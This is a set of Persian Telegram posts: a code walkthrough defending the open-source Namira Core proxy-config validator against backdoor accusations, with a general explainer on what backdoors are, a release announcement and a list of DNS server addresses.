خب کارش چیه مشخصه واقعا ما ازش استفاده میکنیم تا تمام لاجیک رو به شکل مرکزی داشته باشیم چه لاجیکی ؟ منطق های core , worker pool , redis , jobs ,github ...
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L32C1-L48C2
در ادامه فانکشن NewHandler() رو داریم که میاد به عنوان initializer عمل میکنه و استارت میزنه به پول ورکر
تو این فانکشن آسیب پذیری ای وجود نداره ولی نکته ای هست اونم اینه که بیایم یه recovery mechanism پیاده کنیم واسه شرایط خاص که ممکنه job failure داشته باشیم البته من هنوز روی لاجیک های package worker عمیق نشدم و نخوندمشون اینو صد در صدشو بعد از خوندن اونا میگم.
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L50C1-L73C2
هر نکته ای که اینجا بگم به بچه های تیم نامیرا هم اطلاع میدم.
همینجوری که گفتیم میایم اول پکیج api نامیرا رو بررسی میکنیم.
این پکیج سه تا فایل داره
handler.go
router.go
types.go
اول بگم بهتون این سه تا فایل و کلا این پکیج دارن چیکار میکنن
تیم نامیرا اومده یه Restful api رو پیاده کرد و endpoint هایی رو ساخته به جهت کنترل جاب ها و یه لاجیک worker pool هم جداگانه نوشته شده برای پردازش موازی.
این بچه ها اومدن از redis استفاده کردن به جهت چی؟ دوتا اصطلاح مهم داریم واسه کاری که باهاش میکنن
deduplication
results caching
میتونید اینارو سرچ کنید ولی self-explanatory
هستن واقعاً
یه بخش ما لاجیک داریم برای GitHub integration که میتونیم با استفاده ازش نتایج رو ذخیره کنیم تو گیت هاب
و یه health monitoring logic هم پیاده شده برای endpoint ها
بعد بیایم handler.go اصلی رو بررسی کنیم
تو بخش ایمپورت ها اگه توجه کنید میبیند از ورژن 9 گو ردیس استفاده شده که هیچ یک از آسیب پذیری های که دارن باهاش نامیرا رو متهم میکنن داخلش نیست
من اون آسیب پذیری ها رو هم کاملا براتون باز میکنم و حتی بهتون نشون میدم چجوری هیچ بک دوری در کار نبوده و نیست :)
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L17C2-L17C32
اولین بحش های لاجیکال فایل به تعاریف constant ها و type ها میرسیم
یه constant برای ذخیره سازی TTL ردیس
یه استراکت برای نگه داری نتایج تسک ها
دوتا فانکشن تایپ داریم که بیاد از نتایج پروسس رو تایپ بده بهشون
و یکی دیگه ام برای کانفیگ هایی که مثبت بودن بعد از چک
اینجا کد رو ببینید:
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L23C1-L30C49
بعد توی کد میرسیم به استراکچر اصلی برای هندلر
خب کارش چیه مشخصه واقعا ما ازش استفاده میکنیم تا تمام لاجیک رو به شکل مرکزی داشته باشیم چه لاجیکی ؟ منطق های core , worker pool , redis , jobs ,github ...
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L32C1-L48C2
در ادامه فانکشن NewHandler() رو داریم که میاد به عنوان initializer عمل میکنه و استارت میزنه به پول ورکر
تو این فانکشن آسیب پذیری ای وجود نداره ولی نکته ای هست اونم اینه که بیایم یه recovery mechanism پیاده کنیم واسه شرایط خاص که ممکنه job failure داشته باشیم البته من هنوز روی لاجیک های package worker عمیق نشدم و نخوندمشون اینو صد در صدشو بعد از خوندن اونا میگم.
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L50C1-L73C2
GitHub
namira-core/internal/api/handler.go at 8fdcb828411d232749dd760daccd721e590204e5 · NamiraNet/namira-core
Contribute to NamiraNet/namira-core development by creating an account on GitHub.
Forwarded from lou's bs
خب تو یه لایه abstract بیاید بررسی کنیم هسته نامریا به چه شکل کار میکنه ؟
دوستان به شکل کلی تمام کاری که پروژه داره انجام میده اینه که validation انجام بده روی کانفیگ هایی که بهش داده میشه
همین.
رسماً همین!
کانفیگ ها از کجا میان؟ از هرجا که ما بخوایم و میتونیم اونارو یا با api اضافه کنیم یا با کامند لاین اینترفیس. یعنی دست ما بازه.
این validation یا همون اعتبار سنجی ای که دارم میگم یعنی چی؟ یعنی میاد چند تا نکته رو راجع به کانفیگ بررسی میکنه
نکته اول میاد لینک هارو پارس میکنه و چکشون میکنه
این که چطور این کار هارو داره انجام میده رو وقتی میخوام بخش به بخش پکیج هارو توضیح بدم بهتون میگم
تو بخش پارس کردن ما تشخیص میدیم با چه کانفیگ ای طرف ایم دقیق بگم چه پروتوکل ای پشت کانفیگه.
و بخش دوم ما میایم یه هندشیک انجام میدیم که بفهمیم آقا این کانفیگ وصل هست یا نه که بیشتر این کار توسط کد های خود xray انجام میشه.
تو مرحله بعد یه sorting ساده انجام میشه و metadata رو هم نگه میداریم.
حالا چه بلایی سر خروجی میاد؟
آقا خروجی شما هر بلایی دلتون بخواد میتونید سرش بیارید. بدید به api بفرستید تو ریپو خودتون و یا کش کنیدشون دستتون کاملا بازه.
حالا قبل این که بیام بخش به بخش پروژه رو براتون باز کنم بیاید یه نیم نگاهیی باز هم abstract بندازیم به موضوع امنیت
چطور ممکنه داخل پروژه ای که شما دارید سلف هاست میکنید بک دوری وجود داشته باشه؟
واسه این موضوع اول بیاید یه نگاه کوچیک به بک دور داشته باشیم که چی هست و چگونه کار میکنه!
بک دور چیه؟
ساده بیان کنم یه روش واسه این که بیایم سیستم های authentication و encryption یا security controls رو داخل هر بخشی شامل os , hardware, network, software و غیره دور بزنیم و بتونیم به سیستم بدون هیچ خون و خون ریزی ای دسترسی داشته باشی و نرمالی بدون هیچ privilege خاصی هر کاری دلمون خواست بکنیم.
خیلی ساده بیان کنم بک دور کارش اینه بیاید بیاید یه دسترسی به adversary بده که نرمالی این کار توسط یه سیستم command and control یا همون c2 انجام میشه که چی؟ که بشه به شکل غیر مستقیم دستورات لازم رو داد به سیستم.
این یعنی چی؟ یعنی به ساده ترین بیان ممکنه یه ترافیک ای حالا یا بایند شده به پروسس های معتبر یا تو سطح کمتر حرفه به شکل مجزا از سیستم به بیرون میره و بر میگرده!
به شکل کلی backdoor ها یه معماری مشخص دارن و life cycle مشخص تر
یعنی چی ؟
یعنی یه دسترسی ایجاد میشه حالا توسط آسیب پذیری هایی که شناخته شدن یا مهندسی اجتماعی و مالور ها که ما اینجا با اولی کار داریم.
سپس موضوع persistency میاد وسط که نرمالی باید یه روت کیت یا تغییر firmware یا payload های رمزنگاری شده و...( این رو باز نمیکنم کامل) بیاد وسط که بک دور ما بتونه تو پروسه ریبوت ها زنده بمونه.
اینجا تازه نیاز پیدا میشه سیستم ای که تارگت بوده توسط کد مخرب ما (یا دستی) بیاید یه tunnel یا هر نوع channel به شکل encrypted بین سیستم قربانی و سیستم C2 برقرار کنه که اصلا هم نمخوام بحث های پیوتینگ و اینارو باز کنم الان...
در نهایت دیگه اجرای هر کامندی برای هر هدف ای ممکن میشه!
خب حالا ما میدونیم بک دور چیه انواع داره؟ بله داره چندتاشو حال دارم بگم!
malware based ( torjans, ...)
hardware based ( embedded in freaking physical components)
cryptographic backdoors
این داداشمون خیلی تمیز کار میکنه ولی خب سخته خیلی سخته نرمالی دولت ها ازش استفاده میکنن ! چرا چون باید به شکل تعمدی توی ساختار اصلی یه encryption algorithm بیان یه آسیب پذیری بزارن. یا تو مواردی آسیب پذیری های شناخته شده هم به این درد میخوردن ولی خب خیلی زود اونا پچ شدن و بای بای گفتم یه مثال جالب بزنن از این
Dual_EC_DRGB algorithm
بود که میگفتن بکدوری که داره واسه NSA بود خدا میداند ولی خواستید راجع بهش تحقیق کنید جالبه
Firmware backdoors
Rootkits
Web application backdoors
supply chain backdoors
Intentional/developer backdoors
خب بگذریم از انواع این داستان
نامیرا متهم شده به ساخت بکدور و هدف اینه این سابجت رو کاملاً بررسی کنیم.
دوستان به شکل کلی تمام کاری که پروژه داره انجام میده اینه که validation انجام بده روی کانفیگ هایی که بهش داده میشه
همین.
رسماً همین!
کانفیگ ها از کجا میان؟ از هرجا که ما بخوایم و میتونیم اونارو یا با api اضافه کنیم یا با کامند لاین اینترفیس. یعنی دست ما بازه.
این validation یا همون اعتبار سنجی ای که دارم میگم یعنی چی؟ یعنی میاد چند تا نکته رو راجع به کانفیگ بررسی میکنه
نکته اول میاد لینک هارو پارس میکنه و چکشون میکنه
این که چطور این کار هارو داره انجام میده رو وقتی میخوام بخش به بخش پکیج هارو توضیح بدم بهتون میگم
تو بخش پارس کردن ما تشخیص میدیم با چه کانفیگ ای طرف ایم دقیق بگم چه پروتوکل ای پشت کانفیگه.
و بخش دوم ما میایم یه هندشیک انجام میدیم که بفهمیم آقا این کانفیگ وصل هست یا نه که بیشتر این کار توسط کد های خود xray انجام میشه.
تو مرحله بعد یه sorting ساده انجام میشه و metadata رو هم نگه میداریم.
حالا چه بلایی سر خروجی میاد؟
آقا خروجی شما هر بلایی دلتون بخواد میتونید سرش بیارید. بدید به api بفرستید تو ریپو خودتون و یا کش کنیدشون دستتون کاملا بازه.
حالا قبل این که بیام بخش به بخش پروژه رو براتون باز کنم بیاید یه نیم نگاهیی باز هم abstract بندازیم به موضوع امنیت
چطور ممکنه داخل پروژه ای که شما دارید سلف هاست میکنید بک دوری وجود داشته باشه؟
واسه این موضوع اول بیاید یه نگاه کوچیک به بک دور داشته باشیم که چی هست و چگونه کار میکنه!
بک دور چیه؟
ساده بیان کنم یه روش واسه این که بیایم سیستم های authentication و encryption یا security controls رو داخل هر بخشی شامل os , hardware, network, software و غیره دور بزنیم و بتونیم به سیستم بدون هیچ خون و خون ریزی ای دسترسی داشته باشی و نرمالی بدون هیچ privilege خاصی هر کاری دلمون خواست بکنیم.
خیلی ساده بیان کنم بک دور کارش اینه بیاید بیاید یه دسترسی به adversary بده که نرمالی این کار توسط یه سیستم command and control یا همون c2 انجام میشه که چی؟ که بشه به شکل غیر مستقیم دستورات لازم رو داد به سیستم.
این یعنی چی؟ یعنی به ساده ترین بیان ممکنه یه ترافیک ای حالا یا بایند شده به پروسس های معتبر یا تو سطح کمتر حرفه به شکل مجزا از سیستم به بیرون میره و بر میگرده!
به شکل کلی backdoor ها یه معماری مشخص دارن و life cycle مشخص تر
یعنی چی ؟
یعنی یه دسترسی ایجاد میشه حالا توسط آسیب پذیری هایی که شناخته شدن یا مهندسی اجتماعی و مالور ها که ما اینجا با اولی کار داریم.
سپس موضوع persistency میاد وسط که نرمالی باید یه روت کیت یا تغییر firmware یا payload های رمزنگاری شده و...( این رو باز نمیکنم کامل) بیاد وسط که بک دور ما بتونه تو پروسه ریبوت ها زنده بمونه.
اینجا تازه نیاز پیدا میشه سیستم ای که تارگت بوده توسط کد مخرب ما (یا دستی) بیاید یه tunnel یا هر نوع channel به شکل encrypted بین سیستم قربانی و سیستم C2 برقرار کنه که اصلا هم نمخوام بحث های پیوتینگ و اینارو باز کنم الان...
در نهایت دیگه اجرای هر کامندی برای هر هدف ای ممکن میشه!
خب حالا ما میدونیم بک دور چیه انواع داره؟ بله داره چندتاشو حال دارم بگم!
malware based ( torjans, ...)
hardware based ( embedded in freaking physical components)
cryptographic backdoors
این داداشمون خیلی تمیز کار میکنه ولی خب سخته خیلی سخته نرمالی دولت ها ازش استفاده میکنن ! چرا چون باید به شکل تعمدی توی ساختار اصلی یه encryption algorithm بیان یه آسیب پذیری بزارن. یا تو مواردی آسیب پذیری های شناخته شده هم به این درد میخوردن ولی خب خیلی زود اونا پچ شدن و بای بای گفتم یه مثال جالب بزنن از این
Dual_EC_DRGB algorithm
بود که میگفتن بکدوری که داره واسه NSA بود خدا میداند ولی خواستید راجع بهش تحقیق کنید جالبه
Firmware backdoors
Rootkits
Web application backdoors
supply chain backdoors
Intentional/developer backdoors
خب بگذریم از انواع این داستان
نامیرا متهم شده به ساخت بکدور و هدف اینه این سابجت رو کاملاً بررسی کنیم.
Forwarded from SoniaCircuit (Sonia Fatholahi)
🚀 نسخه پایدار Namira Core v1.0.0 منتشر شد! 🚀
یک ابزار حرفهای و اوپنسورس برای تست و ارزیابی کیفیت واقعی کانفیگهای شما! با Namira Core میتونید به صورت خودکار بهترین کانفیگها رو پیدا کرده و از اتصال پایدار لذت ببرید.
〰️〰️〰️〰️〰️〰️〰️〰️〰️〰️
✨ مهمترین ویژگیها:
✅ تست واقعی و دقیق: کانفیگها با اتصال کامل TCP تست میشن، نه فقط یک پینگ ساده!
📡 پشتیبانی از پروتکلهای محبوب: سازگاری کامل با VMess، VLESS، Trojan و Shadowsocks.
📢 اتصال به تلگرام: کانفیگهای سالم و سریع به صورت خودکار برای کانال یا گروه شما ارسال میشه.
💾 ادغام با گیتهاب: نتایج و کانفیگهای معتبر رو مستقیم در ریپازیتوری گیتهاب خودتون ذخیره کنید.
⚙️ معماری بهینه: با استفاده از Worker Pool و Redis، تعداد زیادی کانفیگ رو با سرعت بالا و بدون فشار به سرور پردازش میکنه.
🐳 پشتیبانی کامل از Docker: راهاندازی فوقالعاده سریع و آسان با Docker Compose.
〰️〰️〰️〰️〰️〰️〰️〰️〰️〰️
این نسخه نتیجه بیش از ۶۰ بهبود، شامل ویژگیهای جدید، رفع باگ و بهینهسازیهای عملکردی است.
یک ابزار حرفهای و اوپنسورس برای تست و ارزیابی کیفیت واقعی کانفیگهای شما! با Namira Core میتونید به صورت خودکار بهترین کانفیگها رو پیدا کرده و از اتصال پایدار لذت ببرید.
〰️〰️〰️〰️〰️〰️〰️〰️〰️〰️
✨ مهمترین ویژگیها:
✅ تست واقعی و دقیق: کانفیگها با اتصال کامل TCP تست میشن، نه فقط یک پینگ ساده!
📡 پشتیبانی از پروتکلهای محبوب: سازگاری کامل با VMess، VLESS، Trojan و Shadowsocks.
📢 اتصال به تلگرام: کانفیگهای سالم و سریع به صورت خودکار برای کانال یا گروه شما ارسال میشه.
💾 ادغام با گیتهاب: نتایج و کانفیگهای معتبر رو مستقیم در ریپازیتوری گیتهاب خودتون ذخیره کنید.
⚙️ معماری بهینه: با استفاده از Worker Pool و Redis، تعداد زیادی کانفیگ رو با سرعت بالا و بدون فشار به سرور پردازش میکنه.
🐳 پشتیبانی کامل از Docker: راهاندازی فوقالعاده سریع و آسان با Docker Compose.
〰️〰️〰️〰️〰️〰️〰️〰️〰️〰️
این نسخه نتیجه بیش از ۶۰ بهبود، شامل ویژگیهای جدید، رفع باگ و بهینهسازیهای عملکردی است.
📥 دریافت آخرین نسخه از گیتهاب
⭐️ مشاهده پروژه در گیتهاب
📌 @NamiraNet
GitHub
GitHub - NamiraNet/namira-core
Contribute to NamiraNet/namira-core development by creating an account on GitHub.
Forwarded from SoniaCircuit (Sonia Fatholahi)
لیست دی ان اس هایی که شاید به دردتون بخوره.
1 رادار
10.202.10.10
10.202.10.11
2 سرویس 403
10.202.10.202
10.202.10.102
3 بگذر
185.55.226.26
185.55.225.25
4 شکن
178.22.122.100
185.51.200.2
5 کاربران شاتل
85.15.1.14
85.15.1.15
6 الکترو
78.157.42.100
78.157.42.101
7 هاستیران
172.29.2.100
172.29.2.100
8 Server ir
194.104.158.48
194.104.158.78
9 Level3
209.244.0.3
209.244.0.4
10 Open DNS
208.67.222.222
208.67.220.220
11 Gmaing DNS 1
78.157.42.100
185.43.135.1
12 Gmaing DNS 2
156.154.70.1
156.154.71.1
13 Gmaing DNS 3
149.112.112.112
149.112.112.10
14 Gmaing DNS 4
185.108.22.133
185.108.22.134
15 Gmaing DNS 5
85.214.41.206
89.15.250.41
16 Gmaing DNS 6
9.9.9.9
109.69.8.51
17 Gmaing DNS 7
8.26.56.26
8.26.247.20
18 Gmaing DNS 8
185.121.177.177
169.239.202.202
19 Gmaing DNS 9
185.231.182.126
185.43.135.1
20 Gmaing DNS 10
185.43.135.1
46.16.216.25
21 Gmaing DNS 11
185.213.182.126
185.43.135.1
22 Gmaing DNS 12
199.85.127.10
185.231.182.126
23 Gmaing DNS 13
91.239.100.100
37.152.182.112
24 Gmaing DNS 14
8.26.56.26
8.20.247.20
25 Gmaing DNS 15
78.157.42.100
1.1.1.1
26 Gmaing DNS 16
87.135.66.81
76.76.10.4
27 مخابرات،شاتل،اسیاتک،رایتل
91.239.100.100
89.233.43.71
28 پارس آنلاین
46.224.1.221
46.224.1.220
29 همراه اول
208.67.220.200
208.67.222.222
30 ایرانسل
109.69.8.51
0.0.0.0
31 ایرانسل
74.82.42.42
0.0.0.0
32 مخابرات
8.8.8.8
8.8.4.4
33 مخابرات
4.4.4.4
4.2.2.4
34 مخابرات
195.46.39.39
195.46.39.40
35 مبین نت
10.44.8.8
8.8.8.8
36 سایر اپراتورها
199.85.127.10
199.85.126.10
37 سوئیس
176.10.118.132
176.10.118.133
38 کویت
94.187.170.2
94.187.170.3
39 اسپانیا
195.235.194.7
195.235.194.8
40 تاجیکستان
45.81.37.0
45.81.37.1
1 رادار
10.202.10.10
10.202.10.11
2 سرویس 403
10.202.10.202
10.202.10.102
3 بگذر
185.55.226.26
185.55.225.25
4 شکن
178.22.122.100
185.51.200.2
5 کاربران شاتل
85.15.1.14
85.15.1.15
6 الکترو
78.157.42.100
78.157.42.101
7 هاستیران
172.29.2.100
172.29.2.100
8 Server ir
194.104.158.48
194.104.158.78
9 Level3
209.244.0.3
209.244.0.4
10 Open DNS
208.67.222.222
208.67.220.220
11 Gmaing DNS 1
78.157.42.100
185.43.135.1
12 Gmaing DNS 2
156.154.70.1
156.154.71.1
13 Gmaing DNS 3
149.112.112.112
149.112.112.10
14 Gmaing DNS 4
185.108.22.133
185.108.22.134
15 Gmaing DNS 5
85.214.41.206
89.15.250.41
16 Gmaing DNS 6
9.9.9.9
109.69.8.51
17 Gmaing DNS 7
8.26.56.26
8.26.247.20
18 Gmaing DNS 8
185.121.177.177
169.239.202.202
19 Gmaing DNS 9
185.231.182.126
185.43.135.1
20 Gmaing DNS 10
185.43.135.1
46.16.216.25
21 Gmaing DNS 11
185.213.182.126
185.43.135.1
22 Gmaing DNS 12
199.85.127.10
185.231.182.126
23 Gmaing DNS 13
91.239.100.100
37.152.182.112
24 Gmaing DNS 14
8.26.56.26
8.20.247.20
25 Gmaing DNS 15
78.157.42.100
1.1.1.1
26 Gmaing DNS 16
87.135.66.81
76.76.10.4
27 مخابرات،شاتل،اسیاتک،رایتل
91.239.100.100
89.233.43.71
28 پارس آنلاین
46.224.1.221
46.224.1.220
29 همراه اول
208.67.220.200
208.67.222.222
30 ایرانسل
109.69.8.51
0.0.0.0
31 ایرانسل
74.82.42.42
0.0.0.0
32 مخابرات
8.8.8.8
8.8.4.4
33 مخابرات
4.4.4.4
4.2.2.4
34 مخابرات
195.46.39.39
195.46.39.40
35 مبین نت
10.44.8.8
8.8.8.8
36 سایر اپراتورها
199.85.127.10
199.85.126.10
37 سوئیس
176.10.118.132
176.10.118.133
38 کویت
94.187.170.2
94.187.170.3
39 اسپانیا
195.235.194.7
195.235.194.8
40 تاجیکستان
45.81.37.0
45.81.37.1